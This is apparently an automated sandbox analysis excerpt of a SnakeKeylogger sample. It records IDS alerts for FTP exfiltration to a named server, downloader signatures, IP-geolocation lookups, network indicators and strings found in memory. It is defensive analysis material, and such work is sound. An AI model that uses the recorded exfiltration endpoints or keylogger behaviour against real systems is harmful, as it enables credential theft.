Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 053702F1h	16_2_05370040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537C761h	16_2_0537C4B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 05370751h	16_2_053704A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537F729h	16_2_0537F480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537E5C9h	16_2_0537E320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537B1A9h	16_2_0537AF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537EA21h	16_2_0537E778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537B601h	16_2_0537B358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537BA59h	16_2_0537B7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537EE79h	16_2_0537EBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537D8C1h	16_2_0537D618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537DD19h	16_2_0537DA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then jmp 0537E171h	16_2_0537DEC8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2845535 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M4 : 192.168.2.6:50102 -> 50.31.176.103:34028
Source: Network traffic	Suricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.6:50094 -> 50.31.176.103:21
Source: Network traffic	Suricata IDS: 2845532 - Severity 1 - ETPRO MALWARE SnakeKeylogger Exfil via FTP M1 : 192.168.2.6:50114 -> 50.31.176.103:21

Yara detected Generic Downloader

Source: Yara match	File source: 10.2.WvaGpcFVX.exe.45999b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.WvaGpcFVX.exe.467a5f0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.449e0c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.hesaphareketi-01.exe.447d6a0.2.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.6:50102 -> 50.31.176.103:34028

Source: global traffic

TCP traffic: 192.168.2.6:50089 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org

Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View

ASN Name: SERVERCENTRALUS SERVERCENTRALUS

Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56843 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56856 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56841 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56815 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56885 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56897 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:56874 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56880 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56868 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56858 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56914 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56931 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56834 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:56891 -> 188.114.96.3:443

Source: unknown

FTP traffic detected: 50.31.176.103:21 -> 192.168.2.6:50094 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 7 of 500 allowed.220-Local time is now 11:03. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:56827 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:56857 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.6:56914 -> 188.114.96.3:443 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 50.31.176.103
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.100.168
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.31.73
Source: unknown	TCP traffic detected without corresponding DNS query: 2.16.100.168

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.80 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa

Source: MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: MSBuild.exe, 00000009.00000002.4701100037.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D4A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EAF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F87000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MSBuild.exe, 00000009.00000002.4701100037.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: hesaphareketi-01.exe, 00000000.00000002.2285686680.000000000447D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4698804521.0000000000402000.00000040.00000400.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2339888626.0000000004599000.00000004.00000800.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2339888626.000000000467A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: MSBuild.exe, 00000010.00000002.4699689315.0000000000FBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.h
Source: MSBuild.exe, 00000009.00000002.4701100037.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: hesaphareketi-01.exe, 00000000.00000002.2285058032.0000000002B6C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, WvaGpcFVX.exe, 0000000A.00000002.2338590295.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: MSBuild.exe, 00000009.00000002.4701100037.0000000002DA0000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E58000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EFA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FB6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002EBB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002F5E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000002FA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
